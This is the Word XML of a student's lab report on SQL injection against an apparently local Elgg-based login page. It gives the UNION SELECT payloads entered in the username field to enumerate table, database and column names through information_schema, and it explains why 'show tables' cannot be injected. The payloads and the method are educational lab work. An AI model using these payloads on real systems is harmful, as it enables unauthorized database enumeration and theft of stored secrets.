    <w:p w14:paraId="253E24B3" w14:textId="5C12A0CC" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF8DAC" w14:textId="56DAD7F9" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249C5927" w14:textId="1D150403" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A47AE92" w14:textId="3B00FBD1" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC96688" w14:textId="5C6F2E92" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305A759A" w14:textId="195E5144" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526059A5" w14:textId="555BF4C5" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C9FDA3" w14:textId="37142869" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5F27F4" w14:textId="2C8C6D05" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223F2732" w14:textId="6BCF5C7D" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1C1183" w14:textId="08D889DD" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762D8A65" w14:textId="4C233DDA" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F08A317" w14:textId="0965B3D4" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB072E8" w14:textId="1534EC2D" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A552F2C" w14:textId="20FF8700" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EAC094" w14:textId="19EA9C60" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587DC19A" w14:textId="6B7909A8" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7474A2" w14:textId="17AB3568" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D2D37F3" w14:textId="4AC86E05" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="00883E21"/>
    <w:p w14:paraId="4CEB257D" w14:textId="63E75696" w:rsidR="00975206" w:rsidRDefault="005067D1" w:rsidP="005067D1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00975206">
        <w:t>Q 3.</w:t>
      </w:r>
      <w:r w:rsidR="00C70DD7">
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531744EB" w14:textId="5894F290" w:rsidR="001C55B4" w:rsidRDefault="001C55B4" w:rsidP="00CD02E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The exact content typed into USERNAME and PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A5D65" w14:textId="13FCD618" w:rsidR="00211934" w:rsidRDefault="00211934" w:rsidP="00211934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Three steps to carry out the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F32F47" w14:textId="661BDDA6" w:rsidR="00211934" w:rsidRDefault="001C55B4" w:rsidP="009D3A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find </w:t>
      </w:r>
      <w:r w:rsidR="004A2F2A">
        <w:t>the table name</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707EF8F" w14:textId="77777777" w:rsidR="00023F40" w:rsidRDefault="00023F40" w:rsidP="009D3A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1326FC4D" w14:textId="390885F6" w:rsidR="009D3A34" w:rsidRDefault="009D3A34" w:rsidP="009D3A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USERNAME: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SELECT 0, TABLE_NAME, 0, 0, 0, 0, 0, 0, 0, 0, 0 FROM information_schema.TABLES WHERE TABLE_NAME LIKE ‘%elgg%’ LIMIT 5, 1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9DF2D" w14:textId="77777777" w:rsidR="009D3A34" w:rsidRDefault="009D3A34" w:rsidP="009D3A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E3ACF1" w14:textId="77777777" w:rsidR="009D3A34" w:rsidRDefault="009D3A34" w:rsidP="009D3A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PASSWORD: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E9376" w14:textId="77777777" w:rsidR="009D3A34" w:rsidRDefault="009D3A34" w:rsidP="009D3A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The PASSWORD field is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF96E7" w14:textId="77777777" w:rsidR="009D3A34" w:rsidRDefault="009D3A34" w:rsidP="009D3A34">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43897DBF" w14:textId="11A66F4D" w:rsidR="009D3A34" w:rsidRDefault="004A2F2A" w:rsidP="00023F40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the database name</w:t>
      </w:r>
      <w:r w:rsidR="00364A14">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B8C91" w14:textId="4424F29B" w:rsidR="00023F40" w:rsidRDefault="00492302" w:rsidP="00023F40">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USERNAME: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SELECT 0, TABLE_SCHEMA, 0, 0, 0, 0, 0, 0, 0, 0, 0 FROM information_schema.TABLES WHERE TABLE_NAME = ‘elgg_csrfdatalists’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587BF90D" w14:textId="77777777" w:rsidR="00023F40" w:rsidRDefault="00023F40" w:rsidP="00023F40">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE2BE12" w14:textId="77777777" w:rsidR="00492302" w:rsidRDefault="00492302" w:rsidP="00492302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PASSWORD: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA29320" w14:textId="77777777" w:rsidR="00492302" w:rsidRDefault="00492302" w:rsidP="00492302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The PASSWORD field is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E49B01E" w14:textId="53145A8D" w:rsidR="00492302" w:rsidRDefault="00492302" w:rsidP="00492302"/>
    <w:p w14:paraId="24BA4F83" w14:textId="0C7AE6BE" w:rsidR="00364A14" w:rsidRDefault="00364A14" w:rsidP="004A2F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the column names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622EB667" w14:textId="22DFF879" w:rsidR="00056A99" w:rsidRDefault="00056A99" w:rsidP="003265D6">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USERNAME: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009D1C02">
        <w:t>‘ UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009D1C02">
        <w:t xml:space="preserve"> SELECT 0, COLUMN_NAME, 0, 0, 0, 0, 0, 0, 0, 0, 0 FROM information_schema.COLUMNS WHERE TABLE_NAME = ‘elgg_csrfdatalists’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A381AC" w14:textId="3CBB3131" w:rsidR="009D1C02" w:rsidRDefault="009D1C02" w:rsidP="003265D6">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USERNAME: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SELECT 0, COLUMN_NAME, 0, 0, 0, 0, 0, 0, 0, 0, 0 FROM information_schema.COLUMNS WHERE TABLE_NAME = ‘elgg_csrfdatalists’ LIMIT 1, 1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AF738" w14:textId="60CB180D" w:rsidR="003265D6" w:rsidRDefault="003265D6" w:rsidP="003265D6">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A669C89" w14:textId="6E38ADFE" w:rsidR="003265D6" w:rsidRDefault="003265D6" w:rsidP="003265D6">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>PASSWORD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77E6C8" w14:textId="519FC4BA" w:rsidR="003265D6" w:rsidRDefault="003265D6" w:rsidP="003265D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The PASSWORD field is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054C068A" w14:textId="582EF6A3" w:rsidR="009D1C02" w:rsidRDefault="009D1C02" w:rsidP="001C55B4"/>
    <w:p w14:paraId="68D7FABD" w14:textId="77777777" w:rsidR="005D552D" w:rsidRDefault="005D552D" w:rsidP="005D552D"/>
    <w:p w14:paraId="6140C07B" w14:textId="77777777" w:rsidR="005D552D" w:rsidRDefault="005D552D" w:rsidP="005D552D"/>
    <w:p w14:paraId="0545FD07" w14:textId="77777777" w:rsidR="005D552D" w:rsidRDefault="005D552D" w:rsidP="005D552D"/>
    <w:p w14:paraId="09F31164" w14:textId="77777777" w:rsidR="005D552D" w:rsidRDefault="005D552D" w:rsidP="005D552D"/>
    <w:p w14:paraId="04824687" w14:textId="77777777" w:rsidR="005D552D" w:rsidRDefault="005D552D" w:rsidP="005D552D"/>
    <w:p w14:paraId="49CFBE18" w14:textId="77777777" w:rsidR="005D552D" w:rsidRDefault="005D552D" w:rsidP="005D552D"/>
    <w:p w14:paraId="3F86A103" w14:textId="63A096CB" w:rsidR="005D552D" w:rsidRDefault="005D552D" w:rsidP="005D552D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The output of the successful attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C5DAF7" w14:textId="27E3BC8B" w:rsidR="0064227A" w:rsidRDefault="0064227A" w:rsidP="0064227A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the table name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8B637" w14:textId="66C4E0EF" w:rsidR="005D552D" w:rsidRDefault="00854421" w:rsidP="00854421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="622B155D" wp14:editId="27FAE3B6">
            <wp:extent cx="2662733" cy="3943358"/>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2838" cy="3958322"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F612C2" w14:textId="0D0DC4EE" w:rsidR="0064227A" w:rsidRDefault="0064227A" w:rsidP="0064227A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the database name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680625C5" w14:textId="144982E7" w:rsidR="00854421" w:rsidRDefault="00854421" w:rsidP="00854421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="103B762B" wp14:editId="765519CE">
            <wp:extent cx="2596896" cy="361393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6713" cy="3641516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F87CC" w14:textId="0AE2F1BC" w:rsidR="00B96B17" w:rsidRDefault="00B96B17" w:rsidP="00B96B17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Find the column names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F606BA6" w14:textId="372083D2" w:rsidR="00B96B17" w:rsidRDefault="00DD0EC0" w:rsidP="00DD0EC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A74BCC" wp14:editId="0EB67159">
            <wp:extent cx="2501798" cy="363296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8563" cy="3671834"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="756DD9FD" w14:textId="1C40921F" w:rsidR="00DD0EC0" w:rsidRDefault="00DD0EC0" w:rsidP="00DD0EC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4991F91A" wp14:editId="08C5A7D8">
            <wp:extent cx="2633472" cy="401085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5941" cy="4014613"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74327970" w14:textId="4F69B725" w:rsidR="00F55F7A" w:rsidRDefault="00F55F7A" w:rsidP="00DD0EC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A3F137" w14:textId="1D699E9A" w:rsidR="00F55F7A" w:rsidRDefault="00F55F7A" w:rsidP="00DD0EC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F648B1" w14:textId="68225399" w:rsidR="00F55F7A" w:rsidRDefault="00F55F7A" w:rsidP="00F55F7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Explain why ‘show tables’ work or doesn’t work here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C9E86" w14:textId="77777777" w:rsidR="005F38CA" w:rsidRDefault="00F55F7A" w:rsidP="00F55F7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>‘show tables’ does not work here. Becau</w:t>
      </w:r>
      <w:r w:rsidR="0051259D">
        <w:t xml:space="preserve">se the vulnerable SQL statement is a SELECT statement, and the PHP code in </w:t>
      </w:r>
      <w:r w:rsidR="0051259D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">unsafe_home.php </w:t>
      </w:r>
      <w:r w:rsidR="0051259D">
        <w:t>does not allow multiple SQL statements to execute in a single query. Therefore, I can only use the UNION keyword to inject other SELECT statements.</w:t>
      </w:r>
      <w:r w:rsidR="00A47BEA">
        <w:t xml:space="preserve"> Since ‘show tables’ is not a SELECT statement, there is no way to inject the ‘show tables’ statement while keeping the whole query valid.</w:t>
      </w:r>
      <w:r w:rsidR="00A84A66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24544D3F" w14:textId="77777777" w:rsidR="005F38CA" w:rsidRDefault="005F38CA" w:rsidP="00F55F7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FBFA50" w14:textId="4E0545FA" w:rsidR="00F55F7A" w:rsidRDefault="00A84A66" w:rsidP="00F55F7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, I can still </w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:t>inject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELECT statements </w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> obtain similar information as the ‘show tables’ statement</w:t>
      </w:r>
      <w:r w:rsidR="00ED284F">
        <w:t xml:space="preserve"> would do</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:t xml:space="preserve"> The trick is to use SQL inject</w:t>
      </w:r>
      <w:r w:rsidR="00736319">
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:t xml:space="preserve"> to access the system table </w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AB</w:t>
      </w:r>
      <w:r w:rsidR="00DF1A7B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ES</w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:t xml:space="preserve">in the system database </w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>information__schema</w:t>
      </w:r>
      <w:r w:rsidR="00476285">
        <w:t>, which contain</w:t>
      </w:r>
      <w:r w:rsidR="00736319">
        <w:t xml:space="preserve">s information for all the tables </w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:t>on the server. By using the pattern ‘%elgg%’ for matching, and after a few trial and errors</w:t>
      </w:r>
      <w:r w:rsidR="00D03807">
        <w:t xml:space="preserve"> (by reading the top few results returned by the query one </w:t>
      </w:r>
      <w:r w:rsidR="00BC7DD3">
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidR="00D03807">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B31D09">
        <w:t>another</w:t>
      </w:r>
      <w:r w:rsidR="00D03807">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:t xml:space="preserve">, I successfully found a table named </w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">elgg_csrfdatalists </w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:t xml:space="preserve">that might contain the sensitive information. After I got the table name, I can easily get the database name where the table resides by a second SQL injection attack, still by stealing information from the table </w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>information_schema. TABLES</w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:t xml:space="preserve">. To steal the column information of the table </w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>elgg_csrfdatalists</w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:t xml:space="preserve">, I carried out a third and fourth SQL injection by stealing information from another system table </w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008933A0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>schema.COLUMNS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008933A0">
        <w:t xml:space="preserve"> providing the table name obtained before as the filter. </w:t>
      </w:r>
      <w:r w:rsidR="008667E8">
        <w:t xml:space="preserve">Finally, </w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="008667E8">
        <w:t xml:space="preserve">successfully </w:t>
      </w:r>
      <w:r w:rsidR="008933A0">
        <w:t>got the database name, table name, and column names of the table that stores the sensitive information ‘__site_secret__’.</w:t>
      </w:r>
      <w:r w:rsidR="00414A58">
        <w:t xml:space="preserve"> So far, I have gathered all information needed to repeat the attack in Q3.6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F36764D" w14:textId="3765317A" w:rsidR="008933A0" w:rsidRDefault="008933A0" w:rsidP="00F55F7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F9A176" w14:textId="6E033575" w:rsidR="008933A0" w:rsidRDefault="004800CF" w:rsidP="008933A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Additional s</w:t>
      </w:r>
      <w:r w:rsidR="00F06CD0">
        <w:t>creenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C26B003" w14:textId="57DEFA51" w:rsidR="004800CF" w:rsidRDefault="004800CF" w:rsidP="004800CF">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trial-and-error for finding the table name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D364E" w14:textId="76BD12FF" w:rsidR="004800CF" w:rsidRDefault="004800CF" w:rsidP="004800CF">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Attempt 1:</w:t>
      </w:r>
      <w:r w:rsidR="001B3313">
        <w:t xml:space="preserve"> (fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042938D4" w14:textId="2EBD04DF" w:rsidR="00F06CD0" w:rsidRDefault="004800CF" w:rsidP="00F06CD0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F85BC11" wp14:editId="3049D5D4">
            <wp:extent cx="2449773" cy="2536928"/>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1588" cy="2538808"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FE32C1" w14:textId="77777777" w:rsidR="002D574A" w:rsidRDefault="002D574A" w:rsidP="002D574A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614FA106" w14:textId="77777777" w:rsidR="002D574A" w:rsidRDefault="002D574A" w:rsidP="002D574A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA3A6D5" w14:textId="77777777" w:rsidR="002D574A" w:rsidRDefault="002D574A" w:rsidP="002D574A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
